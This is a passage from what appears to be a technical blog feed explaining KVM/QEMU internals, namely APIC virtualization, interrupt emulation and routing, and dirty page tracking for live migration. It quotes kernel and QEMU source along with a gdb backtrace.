<p>So how is this feature implemented in virtualization? That is: every VCPU accesses the same physical address, yet gets the private data belonging to that VCPU. Let’s first look at qemu’s implementation. In the LAPIC realize function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void apic_realize(DeviceState *dev, Error **errp)
{
APICCommonState *s = APIC(dev);
if (s->id >= MAX_APICS) {
error_setg(errp, "%s initialization failed. APIC ID %d is invalid",
object_get_typename(OBJECT(dev)), s->id);
return;
}
memory_region_init_io(&s->io_memory, OBJECT(s), &apic_io_ops, s, "apic-msi",
APIC_SPACE_SIZE);
s->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, apic_timer, s);
local_apics[s->id] = s;
msi_nonbroken = true;
}
</code></pre></div></div>
<p>We can see that the created apic is stored in a global variable ‘local_apics’. In the access function, the code first needs to determine which VCPU is accessing the registers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void apic_mem_writel(void *opaque, hwaddr addr, uint32_t val)
{
DeviceState *dev;
APICCommonState *s;
int index = (addr >> 4) & 0xff;
if (addr > 0xfff || !index) {
/* MSI and MMIO APIC are at the same memory location,
* but actually not on the global bus: MSI is on PCI bus
* APIC is connected directly to the CPU.
* Mapping them on the global bus happens to work because
* MSI registers are reserved in APIC MMIO and vice versa. */
MSIMessage msi = { .address = addr, .data = val };
apic_send_msi(&msi);
return;
}
dev = cpu_get_current_apic();
if (!dev) {
return;
}
s = APIC(dev);
}
</code></pre></div></div>
<p>The idea behind qemu is easy: first get the current VCPU and then access its lapic. But how can this be done in APIC virtualization? How can the CPU implement this without a VM-exit? The secret is the APIC-access page and the virtual-APIC page. I will not go into the complicated details of these two VMCS fields here; just treat the virtual-APIC page as the shadow page of the APIC-access page. The APIC-access page is per-VM, while the virtual-APIC page is per-VCPU. With full APIC virtualization, when the guest accesses the APIC-access page, the CPU returns the corresponding data from the virtual-APIC page.</p>
<p>The APIC-access page is set in ‘kvm->kvm_arch->apic_access_page’ and allocated in ‘alloc_apic_access_page’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int alloc_apic_access_page(struct kvm *kvm)
{
struct page *page;
struct kvm_userspace_memory_region kvm_userspace_mem;
int r = 0;
mutex_lock(&kvm->slots_lock);
if (kvm->arch.apic_access_page)
goto out;
kvm_userspace_mem.slot = APIC_ACCESS_PAGE_PRIVATE_MEMSLOT;
kvm_userspace_mem.flags = 0;
kvm_userspace_mem.guest_phys_addr = 0xfee00000ULL;
kvm_userspace_mem.memory_size = PAGE_SIZE;
r = __kvm_set_memory_region(kvm, &kvm_userspace_mem);
if (r)
goto out;
page = gfn_to_page(kvm, 0xfee00);
if (is_error_page(page)) {
r = -EFAULT;
goto out;
}
kvm->arch.apic_access_page = page;
out:
mutex_unlock(&kvm->slots_lock);
return r;
}
</code></pre></div></div>
<p>Here we allocate the memslot for 0xfee00000 and set it as the ‘apic_access_page’.
The virtual-APIC page is backed by ‘kvm_lapic->regs’ and is allocated in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_create_lapic(struct kvm_vcpu *vcpu)
{
struct kvm_lapic *apic;
ASSERT(vcpu != NULL);
apic_debug("apic_init %d\n", vcpu->vcpu_id);
apic = kzalloc(sizeof(*apic), GFP_KERNEL);
if (!apic)
goto nomem;
vcpu->arch.apic = apic;
apic->regs = (void *)get_zeroed_page(GFP_KERNEL);
if (!apic->regs) {
printk(KERN_ERR "malloc apic regs error for vcpu %x\n",
vcpu->vcpu_id);
goto nomem_free_apic;
}
apic->vcpu = vcpu;
...
}
</code></pre></div></div>
<p>Then in ‘vmx_vcpu_reset’, it writes the addresses of the APIC-access page and the virtual-APIC page into the VMCS.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_vcpu_reset(struct kvm_vcpu *vcpu)
{
struct vcpu_vmx *vmx = to_vmx(vcpu);
if (cpu_has_vmx_tpr_shadow()) {
vmcs_write64(VIRTUAL_APIC_PAGE_ADDR, 0);
if (vm_need_tpr_shadow(vmx->vcpu.kvm))
vmcs_write64(VIRTUAL_APIC_PAGE_ADDR,
__pa(vmx->vcpu.arch.apic->regs));
vmcs_write32(TPR_THRESHOLD, 0);
}
if (vm_need_virtualize_apic_accesses(vmx->vcpu.kvm))
vmcs_write64(APIC_ACCESS_ADDR,
page_to_phys(vmx->vcpu.kvm->arch.apic_access_page));
if (vmx_vm_has_apicv(vcpu->kvm))
memset(&vmx->pi_desc, 0, sizeof(struct pi_desc));
if (vmx->vpid != 0)
vmcs_write16(VIRTUAL_PROCESSOR_ID, vmx->vpid);
vpid_sync_context(vmx);
}
</code></pre></div></div>
<p>When the guest accesses an APIC register (from base 0xfee00000), it actually accesses the virtual-APIC page of the corresponding VCPU.</p>
<p>A later article will discuss virtual interrupt delivery in APIC virtualization.</p>
<h3> Reference </h3>
<ol>
<li>Intel SDM</li>
<li>
<p>https://software.intel.com/en-us/forums/intel-moderncode-for-parallel-architectures/topic/296237</p>
</li>
<li>https://software.intel.com/en-us/forums/virtualization-software-development/topic/284386</li>
</ol>
kvm interrupt emulation2018-08-27T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/27/kvm-interrupt-emulation
<h3> External interrupt </h3>
<p>First of all, let’s clarify what an external interrupt means in kvm: an interrupt destined for the host. A VM-exit is triggered when the CPU receives an external interrupt. This is configured by the flag PIN_BASED_EXT_INTR_MASK, which is written to the VMCS’s pin-based VM-execution control field in the function setup_vmcs_config. When an external interrupt comes, the handle_external_intr callback is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kvm_x86_ops->handle_external_intr(vcpu);
</code></pre></div></div>
<p>For intel CPU, this is the ‘vmx_handle_external_intr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_handle_external_intr(struct kvm_vcpu *vcpu)
{
u32 exit_intr_info = vmcs_read32(VM_EXIT_INTR_INFO);
/*
* If external interrupt exists, IF bit is set in rflags/eflags on the
* interrupt stack frame, and interrupt will be enabled on a return
* from interrupt handler.
*/
if ((exit_intr_info & (INTR_INFO_VALID_MASK | INTR_INFO_INTR_TYPE_MASK))
== (INTR_INFO_VALID_MASK | INTR_TYPE_EXT_INTR)) {
unsigned int vector;
unsigned long entry;
gate_desc *desc;
struct vcpu_vmx *vmx = to_vmx(vcpu);
#ifdef CONFIG_X86_64
unsigned long tmp;
#endif
vector = exit_intr_info & INTR_INFO_VECTOR_MASK;
desc = (gate_desc *)vmx->host_idt_base + vector;
entry = gate_offset(*desc);
asm volatile(
#ifdef CONFIG_X86_64
"mov %%" _ASM_SP ", %[sp]\n\t"
"and $0xfffffffffffffff0, %%" _ASM_SP "\n\t"
"push $%c[ss]\n\t"
"push %[sp]\n\t"
#endif
"pushf\n\t"
"orl $0x200, (%%" _ASM_SP ")\n\t"
__ASM_SIZE(push) " $%c[cs]\n\t"
"call *%[entry]\n\t"
:
#ifdef CONFIG_X86_64
[sp]"=&r"(tmp)
#endif
:
[entry]"r"(entry),
[ss]"i"(__KERNEL_DS),
[cs]"i"(__KERNEL_CS)
);
} else
local_irq_enable();
}
</code></pre></div></div>
<p>Here it checks whether a valid external interrupt exists (INTR_INFO_VALID_MASK). If there is one, it calls the host’s interrupt handler directly through the IDT entry.</p>
<p>That’s easy, nothing mysterious.</p>
<h3> Interrupt delivery methods </h3>
<p>There are three generations of interrupt delivery and servicing on Intel architecture: XT-PIC for legacy uni-processor (UP) systems, IO-APIC for modern UP and multi-processor (MP) systems, and MSI.</p>
<h4> XT-PIC </h4>
<p>XT-PIC is the oldest form of interrupt delivery. It uses two Intel 8259 PIC chips, and each PIC chip has eight interrupt lines.</p>
<p><img src="/assets/img/kvminterrupt/1.png" alt="" /></p>
<p>When a connected device needs servicing by the CPU, it drives the signal on the interrupt pin to which it is connected. The 8259 PIC in turn drives the interrupt line into the CPU. From the Intel 8259 PIC, the OS is able to determine what interrupt is pending. The CPU masks that interrupt and begins running the ISR associated with it. The ISR will check with the device with which it is associated for a pending interrupt. If the device has a pending interrupt, then the ISR will clear the Interrupt Request (IRQ) pending and begin servicing the device. Once the ISR has completed servicing the device, it will schedule a tasklet if more processing is needed and return control back to the OS, indicating that it handled an interrupt. Once the OS has serviced the interrupt, it will unmask the interrupt from the Intel 8259 PIC and run any tasklet which has been scheduled. </p>
<h4> IO-APIC </h4>
<p>When Intel developed multiprocessor systems, it also introduced the concept of a Local APIC (Advanced PIC) in the CPU and IO-APICs connected to devices. Each IO-APIC (82093) has 24 interrupt lines. The IO-APIC provides backwards compatibility with the older XT-PIC model; as a result, the lower 16 interrupts are usually dedicated to their assignments under the XT-PIC model. This assignment provides only eight additional interrupts, which forces sharing. The following is the sequence for IO-APIC delivery and servicing:</p>
<ul>
<li>A device needing servicing from the CPU drives the interrupt line into the IO-APIC associated with it.</li>
<li>The IO-APIC writes the interrupt vector associated with its driven interrupt line into the Local APIC of the CPU.</li>
<li>The interrupted CPU runs the ISRs associated with the interrupt vector it received. Each ISR for a shared interrupt is run to find the device needing service: each device has its IRQ-pending bit checked, and the requesting device has its bit cleared.</li>
</ul>
<h4> Message Signaled Interrupts (MSI) </h4>
<p>The MSI model eliminates the devices’ need to use the IO-APIC, allowing every device to write directly to the CPU’s Local APIC. The MSI model supports 224 interrupts, and with this high number of interrupts, IRQ sharing is no longer allowed. The following is the sequence for MSI delivery and servicing:</p>
<ul>
<li>A device needing servicing from the CPU generates an MSI, writing the interrupt vector directly into the Local APIC of the CPU servicing it.</li>
<li>The interrupted CPU runs the ISR associated with the interrupt vector it received. The device is serviced without any need to check and clear an IRQ-pending bit.</li>
</ul>
<p>Following picture shows the relations of the three methods(From https://cloud.tencent.com/developer/article/1087271).</p>
<p><img src="/assets/img/kvminterrupt/2.png" alt="" /></p>
<p>For real hardware, the interrupt is generated by the device itself, so in a virtualization environment the interrupt is generated by the device emulation. It can be generated either in qemu (device emulation implemented in userspace) or in kvm (device emulation implemented in kernel space).</p>
<p>The device emulation triggers an irq (< 16), which is delivered to both the i8259 and the io-apic; the io-apic formats the interrupt message and routes it to the lapic. So there are three interrupt controller devices to emulate: the i8259, the io-apic and the lapic. All of them can be implemented in qemu, or all in kvm, or split: pic and io-apic in qemu and lapic in kvm.</p>
<p>Let’s first talk about the implementation in kvm.</p>
<h3> KVM implements the irqchip </h3>
<h4> The initialization of PIC and IO-APIC </h4>
<p>The PIC and IO-APIC are created by the VM ioctl ‘KVM_CREATE_IRQCHIP’. It is issued in ‘kvm_irqchip_create’ in qemu and implemented in ‘kvm_arch_vm_ioctl’ in kvm.
The pic is created by the function ‘kvm_create_pic’ and assigned to ‘kvm->arch.vpic’. The creation function allocates a ‘kvm_pic’ and also registers the device’s read/write ops.</p>
<p>Following the pic, it creates the ioapic using the function ‘kvm_ioapic_init’. As with the pic, the creation function allocates a ‘kvm_ioapic’, registers the read/write ops, and assigns it to ‘kvm->arch.vioapic’.</p>
<p>After creating the pic and ioapic, it calls ‘kvm_setup_default_irq_routing’ to set up the routing table.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_setup_default_irq_routing(struct kvm *kvm)
{
return kvm_set_irq_routing(kvm, default_routing,
ARRAY_SIZE(default_routing), 0);
}
int kvm_set_irq_routing(struct kvm *kvm,
const struct kvm_irq_routing_entry *ue,
unsigned nr,
unsigned flags)
{
struct kvm_irq_routing_table *new, *old;
u32 i, j, nr_rt_entries = 0;
int r;
for (i = 0; i < nr; ++i) {
if (ue[i].gsi >= KVM_MAX_IRQ_ROUTES)
return -EINVAL;
nr_rt_entries = max(nr_rt_entries, ue[i].gsi);
}
nr_rt_entries += 1;
new = kzalloc(sizeof(*new) + (nr_rt_entries * sizeof(struct hlist_head))
+ (nr * sizeof(struct kvm_kernel_irq_routing_entry)),
GFP_KERNEL);
if (!new)
return -ENOMEM;
new->rt_entries = (void *)&new->map[nr_rt_entries];
new->nr_rt_entries = nr_rt_entries;
for (i = 0; i < KVM_NR_IRQCHIPS; i++)
for (j = 0; j < KVM_IRQCHIP_NUM_PINS; j++)
new->chip[i][j] = -1;
for (i = 0; i < nr; ++i) {
r = -EINVAL;
if (ue->flags)
goto out;
r = setup_routing_entry(new, &new->rt_entries[i], ue);
if (r)
goto out;
++ue;
}
mutex_lock(&kvm->irq_lock);
old = kvm->irq_routing;
kvm_irq_routing_update(kvm, new);
mutex_unlock(&kvm->irq_lock);
synchronize_rcu();
new = old;
r = 0;
out:
kfree(new);
return r;
}
</code></pre></div></div>
<p>‘kvm_irq_routing_entry’ represents the irq routing entry. The default_routing is defined as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct kvm_irq_routing_entry default_routing[] = {
ROUTING_ENTRY2(0), ROUTING_ENTRY2(1),
ROUTING_ENTRY2(2), ROUTING_ENTRY2(3),
ROUTING_ENTRY2(4), ROUTING_ENTRY2(5),
ROUTING_ENTRY2(6), ROUTING_ENTRY2(7),
ROUTING_ENTRY2(8), ROUTING_ENTRY2(9),
ROUTING_ENTRY2(10), ROUTING_ENTRY2(11),
ROUTING_ENTRY2(12), ROUTING_ENTRY2(13),
ROUTING_ENTRY2(14), ROUTING_ENTRY2(15),
ROUTING_ENTRY1(16), ROUTING_ENTRY1(17),
ROUTING_ENTRY1(18), ROUTING_ENTRY1(19),
ROUTING_ENTRY1(20), ROUTING_ENTRY1(21),
ROUTING_ENTRY1(22), ROUTING_ENTRY1(23),
}
</code></pre></div></div>
<p>For irq < 16 there are two entries, one for the pic and one for the ioapic; the ioapic entry comes first.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define IOAPIC_ROUTING_ENTRY(irq) \
{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP, \
.u.irqchip.irqchip = KVM_IRQCHIP_IOAPIC, .u.irqchip.pin = (irq) }
#define ROUTING_ENTRY1(irq) IOAPIC_ROUTING_ENTRY(irq)
#ifdef CONFIG_X86
# define PIC_ROUTING_ENTRY(irq) \
{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP, \
.u.irqchip.irqchip = SELECT_PIC(irq), .u.irqchip.pin = (irq) % 8 }
# define ROUTING_ENTRY2(irq) \
IOAPIC_ROUTING_ENTRY(irq), PIC_ROUTING_ENTRY(irq)
#endif
</code></pre></div></div>
<p>Here irqchip is 0 and 1 for the two pic chips and 2 for the ioapic.</p>
<p>Go to the function ‘kvm_set_irq_routing’; this function allocates a ‘kvm_irq_routing_table’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kvm_irq_routing_table {
int chip[KVM_NR_IRQCHIPS][KVM_IRQCHIP_NUM_PINS];
struct kvm_kernel_irq_routing_entry *rt_entries;
u32 nr_rt_entries;
/*
* Array indexed by gsi. Each entry contains list of irq chips
* the gsi is connected to.
*/
struct hlist_head map[0];
};
</code></pre></div></div>
<p>Here ‘KVM_NR_IRQCHIPS’ is 3, meaning two pic chips and one io-apic chip; ‘KVM_IRQCHIP_NUM_PINS’ is 24, meaning the ioapic has 24 pins. Every irq has one ‘kvm_kernel_irq_routing_entry’.</p>
<p>For every ‘kvm_irq_routing_entry’, it calls ‘setup_routing_entry’ to initialize the ‘kvm_kernel_irq_routing_entry’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int setup_routing_entry(struct kvm_irq_routing_table *rt,
struct kvm_kernel_irq_routing_entry *e,
const struct kvm_irq_routing_entry *ue)
{
int r = -EINVAL;
struct kvm_kernel_irq_routing_entry *ei;
/*
* Do not allow GSI to be mapped to the same irqchip more than once.
* Allow only one to one mapping between GSI and MSI.
*/
hlist_for_each_entry(ei, &rt->map[ue->gsi], link)
if (ei->type == KVM_IRQ_ROUTING_MSI ||
ue->type == KVM_IRQ_ROUTING_MSI ||
ue->u.irqchip.irqchip == ei->irqchip.irqchip)
return r;
e->gsi = ue->gsi;
e->type = ue->type;
r = kvm_set_routing_entry(rt, e, ue);
if (r)
goto out;
hlist_add_head(&e->link, &rt->map[e->gsi]);
r = 0;
out:
return r;
}
</code></pre></div></div>
<p>The job of ‘kvm_set_routing_entry’ is to install the ‘set’ callback: for a pic irq it sets it to ‘kvm_set_pic_irq’, and for an ioapic irq to ‘kvm_set_ioapic_irq’. Entries sharing the same gsi are linked through the ‘link’ field of ‘kvm_kernel_irq_routing_entry’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_set_routing_entry(struct kvm_irq_routing_table *rt,
struct kvm_kernel_irq_routing_entry *e,
const struct kvm_irq_routing_entry *ue)
{
int r = -EINVAL;
int delta;
unsigned max_pin;
switch (ue->type) {
case KVM_IRQ_ROUTING_IRQCHIP:
delta = 0;
switch (ue->u.irqchip.irqchip) {
case KVM_IRQCHIP_PIC_MASTER:
e->set = kvm_set_pic_irq;
max_pin = PIC_NUM_PINS;
break;
case KVM_IRQCHIP_PIC_SLAVE:
e->set = kvm_set_pic_irq;
max_pin = PIC_NUM_PINS;
delta = 8;
break;
case KVM_IRQCHIP_IOAPIC:
max_pin = KVM_IOAPIC_NUM_PINS;
e->set = kvm_set_ioapic_irq;
break;
default:
goto out;
}
...
}
r = 0;
out:
return r;
}
</code></pre></div></div>
<p>The following shows the structure relations.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm
+-------------+
| |
| |
| |
+-------------+ +---------------------+
|irq_routing +---------> | chip |
+-------------+ +---------------------+
| | | rt_entries +----------+
| | +---------------------+ |
| | | nr_rt_entries | |
+-------------+ +---------------------+ |
| hlist_head ... | |
| | |
| | |
| | |
+---------------------+ <--------+
kvm_kernel_irq_routing_entry |
| |
+---------------------+
| |
                                 | kvm_set_pic_irq     |
+---------------------+
| |
| |
+---------------------+
| |
| |
+---------------------+
</code></pre></div></div>
<h4> Interrupt injection </h4>
<p>Devices generate interrupts by calling the function ‘kvm_set_irq’ in kvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_set_irq(struct kvm *kvm, int irq_source_id, u32 irq, int level,
bool line_status)
{
struct kvm_kernel_irq_routing_entry *e, irq_set[KVM_NR_IRQCHIPS];
int ret = -1, i = 0;
struct kvm_irq_routing_table *irq_rt;
trace_kvm_set_irq(irq, level, irq_source_id);
/* Not possible to detect if the guest uses the PIC or the
* IOAPIC. So set the bit in both. The guest will ignore
* writes to the unused one.
*/
rcu_read_lock();
irq_rt = rcu_dereference(kvm->irq_routing);
if (irq < irq_rt->nr_rt_entries)
hlist_for_each_entry(e, &irq_rt->map[irq], link)
irq_set[i++] = *e;
rcu_read_unlock();
while(i--) {
int r;
r = irq_set[i].set(&irq_set[i], kvm, irq_source_id, level,
line_status);
if (r < 0)
continue;
ret = r + ((ret < 0) ? 0 : ret);
}
return ret;
}
</code></pre></div></div>
<p>First find all the ‘kvm_kernel_irq_routing_entry’ with the same irq and then call the set callback function. As we have seen, this set callback can be ‘kvm_set_ioapic_irq’ or ‘kvm_set_pic_irq’. Let’s first talk about the pic situation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int kvm_set_pic_irq(struct kvm_kernel_irq_routing_entry *e,
struct kvm *kvm, int irq_source_id, int level,
bool line_status)
{
#ifdef CONFIG_X86
struct kvm_pic *pic = pic_irqchip(kvm);
return kvm_pic_set_irq(pic, e->irqchip.pin, irq_source_id, level);
#else
return -1;
#endif
}
int kvm_pic_set_irq(struct kvm_pic *s, int irq, int irq_source_id, int level)
{
int ret, irq_level;
BUG_ON(irq < 0 || irq >= PIC_NUM_PINS);
pic_lock(s);
irq_level = __kvm_irq_line_state(&s->irq_states[irq],
irq_source_id, level);
ret = pic_set_irq1(&s->pics[irq >> 3], irq & 7, irq_level);
pic_update_irq(s);
trace_kvm_pic_set_irq(irq >> 3, irq & 7, s->pics[irq >> 3].elcr,
s->pics[irq >> 3].imr, ret == 0);
pic_unlock(s);
return ret;
}
</code></pre></div></div>
<p>An edge-triggered interrupt needs two calls of ‘kvm_set_irq’: the first triggers the interrupt and the second re-arms the line for the next time.</p>
<p>In ‘pic_unlock’ it will kick the vcpu so the cpu has a chance to handle the interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void pic_unlock(struct kvm_pic *s)
__releases(&s->lock)
{
bool wakeup = s->wakeup_needed;
struct kvm_vcpu *vcpu, *found = NULL;
int i;
s->wakeup_needed = false;
spin_unlock(&s->lock);
if (wakeup) {
kvm_for_each_vcpu(i, vcpu, s->kvm) {
if (kvm_apic_accept_pic_intr(vcpu)) {
found = vcpu;
break;
}
}
if (!found)
return;
kvm_make_request(KVM_REQ_EVENT, found);
kvm_vcpu_kick(found);
}
}
void kvm_vcpu_kick(struct kvm_vcpu *vcpu)
{
int me;
int cpu = vcpu->cpu;
wait_queue_head_t *wqp;
wqp = kvm_arch_vcpu_wq(vcpu);
if (waitqueue_active(wqp)) {
wake_up_interruptible(wqp);
++vcpu->stat.halt_wakeup;
}
me = get_cpu();
if (cpu != me && (unsigned)cpu < nr_cpu_ids && cpu_online(cpu))
if (kvm_arch_vcpu_should_kick(vcpu))
smp_send_reschedule(cpu);
put_cpu();
}
static void native_smp_send_reschedule(int cpu)
{
if (unlikely(cpu_is_offline(cpu))) {
WARN_ON(1);
return;
}
apic->send_IPI_mask(cpumask_of(cpu), RESCHEDULE_VECTOR);
}
</code></pre></div></div>
<p>This sends an IPI to the target CPU so it can process the interrupt later.
Then in ‘vcpu_enter_guest’, it will call ‘inject_pending_event’. In ‘kvm_cpu_has_extint’, the PIC output has been set to 1, so it will call ‘kvm_queue_interrupt’ and ‘kvm_x86_ops->set_irq’. The latter callback is ‘vmx_inject_irq’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_inject_irq(struct kvm_vcpu *vcpu)
{
struct vcpu_vmx *vmx = to_vmx(vcpu);
uint32_t intr;
int irq = vcpu->arch.interrupt.nr;
trace_kvm_inj_virq(irq);
++vcpu->stat.irq_injections;
if (vmx->rmode.vm86_active) {
int inc_eip = 0;
if (vcpu->arch.interrupt.soft)
inc_eip = vcpu->arch.event_exit_inst_len;
if (kvm_inject_realmode_interrupt(vcpu, irq, inc_eip) != EMULATE_DONE)
kvm_make_request(KVM_REQ_TRIPLE_FAULT, vcpu);
return;
}
intr = irq | INTR_INFO_VALID_MASK;
if (vcpu->arch.interrupt.soft) {
intr |= INTR_TYPE_SOFT_INTR;
vmcs_write32(VM_ENTRY_INSTRUCTION_LEN,
vmx->vcpu.arch.event_exit_inst_len);
} else
intr |= INTR_TYPE_EXT_INTR;
vmcs_write32(VM_ENTRY_INTR_INFO_FIELD, intr);
}
</code></pre></div></div>
<p>Here we can see the interrupt has been written to the VMCS. Notice that in ‘kvm_cpu_get_interrupt’, the callchain is ‘kvm_cpu_get_extint’->’kvm_pic_read_irq’->’pic_intack’. The last function sets the isr and clears the irr, which means the CPU is preparing to process the interrupt (anyway, the cpu will enter the guest quickly).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static inline void pic_intack(struct kvm_kpic_state *s, int irq)
{
s->isr |= 1 << irq;
/*
* We don't clear a level sensitive interrupt here
*/
if (!(s->elcr & (1 << irq)))
s->irr &= ~(1 << irq);
if (s->auto_eoi) {
if (s->rotate_on_auto_eoi)
s->priority_add = (irq + 1) & 7;
pic_clear_isr(s, irq);
}
}
</code></pre></div></div>
<p>This is the story of PIC emulation. Now let’s see ‘kvm_set_ioapic_irq’. This function just calls ‘kvm_ioapic_set_irq’. After ‘ioapic_service’->’ioapic_deliver’->’kvm_irq_delivery_to_apic’, we finally deliver the interrupt to the lapic. This function tries to find a vcpu to deliver to, then calls ‘kvm_apic_set_irq’ to set the lapic’s irq.</p>
<p>This is the story of interrupt (software) virtualization. As we can see, every interrupt needs a VM-exit, which imposes heavy virtualization overhead. Next time we will see how hardware assists interrupt virtualization.</p>
qemu/kvm dirty pages tracking in migration2018-08-11T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/11/dirty-pages-tracking-in-migration
<p>Most of live migration’s work is migrating the guest’s RAM from the src host to the dest host,
so qemu needs to track the guest’s dirty pages in order to transfer them.
This article discusses how qemu does this tracking.</p>
<p>In a summary, the following steps show the overview of dirty tracking:</p>
<ol>
<li>qemu allocates a bitmap and sets all its bits to 1 (meaning dirty)</li>
<li>qemu calls kvm to set memory slots with ‘KVM_MEM_LOG_DIRTY_PAGES’ flags</li>
<li>qemu calls kvm to get the kvm dirty bitmap</li>
<li>qemu kvm wrapper: walks the dirty bitmap (from kvm) and fills the ram_list dirty bitmap</li>
<li>migration code: walks the ram_list dirty bitmap and sets the qemu dirty page bitmap</li>
</ol>
<h3> qemu and kvm create bitmap </h3>
<p>In the ram migration setup function, it allocates the qemu bitmap in function ‘ram_save_init_globals’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
...
qemu_mutex_lock_iothread();
qemu_mutex_lock_ramlist();
rcu_read_lock();
bytes_transferred = 0;
reset_ram_globals();
ram_bitmap_pages = last_ram_offset() >> TARGET_PAGE_BITS;
migration_bitmap_rcu = g_new0(struct BitmapRcu, 1);
migration_bitmap_rcu->bmap = bitmap_new(ram_bitmap_pages);
bitmap_set(migration_bitmap_rcu->bmap, 0, ram_bitmap_pages);
...
/*
* Count the total number of pages used by ram blocks not including any
* gaps due to alignment or unplugs.
*/
migration_dirty_pages = ram_bytes_total() >> TARGET_PAGE_BITS;
memory_global_dirty_log_start();
migration_bitmap_sync();
qemu_mutex_unlock_ramlist();
qemu_mutex_unlock_iothread();
rcu_read_unlock();
return 0;
}
</code></pre></div></div>
<p>As we can see, ‘migration_bitmap_rcu’ is the bitmap that qemu maintains.</p>
<p>Then it calls ‘memory_global_dirty_log_start’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void memory_global_dirty_log_start(void)
{
global_dirty_log = true;
MEMORY_LISTENER_CALL_GLOBAL(log_global_start, Forward);
/* Refresh DIRTY_LOG_MIGRATION bit. */
memory_region_transaction_begin();
memory_region_update_pending = true;
memory_region_transaction_commit();
}
</code></pre></div></div>
<p>This sets ‘global_dirty_log’ to true and commits the memory change to kvm (for update).</p>
<p>It then calls ‘address_space_update_topology_pass’, which calls ‘log_start’ for every MemoryRegionSection.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (adding) {
MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop);
if (frnew->dirty_log_mask & ~frold->dirty_log_mask) {
MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, log_start,
frold->dirty_log_mask,
frnew->dirty_log_mask);
}
</code></pre></div></div>
<p>For kvm it is ‘kvm_log_start’. We can see in ‘kvm_mem_flags’ it adds the ‘KVM_MEM_LOG_DIRTY_PAGES’ flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int kvm_mem_flags(MemoryRegion *mr)
{
bool readonly = mr->readonly || memory_region_is_romd(mr);
int flags = 0;
if (memory_region_get_dirty_log_mask(mr) != 0) {
flags |= KVM_MEM_LOG_DIRTY_PAGES;
}
if (readonly && kvm_readonly_mem_allowed) {
flags |= KVM_MEM_READONLY;
}
return flags;
}
</code></pre></div></div>
<p>The following backtrace shows the callchain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) bt
#0 kvm_set_user_memory_region (kml=0x55ab8fc502c0, slot=0x55ab8fc50500) at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:236
#1 0x000055ab8df10a92 in kvm_slot_update_flags (kml=0x55ab8fc502c0, mem=0x55ab8fc50500, mr=0x55ab8fd36f70)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:376
#2 0x000055ab8df10b1f in kvm_section_update_flags (kml=0x55ab8fc502c0, section=0x7f0ab37fb4c0)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:389
#3 0x000055ab8df10b65 in kvm_log_start (listener=0x55ab8fc502c0, section=0x7f0ab37fb4c0, old=0, new=4)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:404
#4 0x000055ab8df18b33 in address_space_update_topology_pass (as=0x55ab8ea21880 <address_space_memory>, old_view=0x7f0cc4118ca0,
new_view=0x7f0aa804d380, adding=true) at /home/liqiang02/qemu0711/qemu-2.8/memory.c:854
#5 0x000055ab8df18d9b in address_space_update_topology (as=0x55ab8ea21880 <address_space_memory>)
at /home/liqiang02/qemu0711/qemu-2.8/memory.c:886
#6 0x000055ab8df18ed6 in memory_region_transaction_commit () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:926
#7 0x000055ab8df1c9ef in memory_global_dirty_log_start () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:2276
#8 0x000055ab8df30ce6 in ram_save_init_globals () at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1939
#9 0x000055ab8df30d36 in ram_save_setup (f=0x55ab90d874c0, opaque=0x0) at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1960
#10 0x000055ab8df3609a in qemu_savevm_state_begin (f=0x55ab90d874c0, params=0x55ab8ea0178c <current_migration+204>)
at /home/liqiang02/qemu0711/qemu-2.8/migration/savevm.c:956
#11 0x000055ab8e25d9b8 in migration_thread (opaque=0x55ab8ea016c0 <current_migration>) at migration/migration.c:1829
